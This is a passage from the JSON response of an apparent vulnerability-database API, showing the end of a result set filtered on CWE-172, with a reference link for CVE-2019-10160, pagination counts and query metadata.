Program","url":"https://www.cve.org/CVERecord?id=CVE-2019-10160","note":"authoritative record"}]}],"pagination":{"page":1,"limit":20,"total":5,"totalPages":1,"hasNext":false,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-09T01:13:36.857Z","durationMs":21,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-172"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}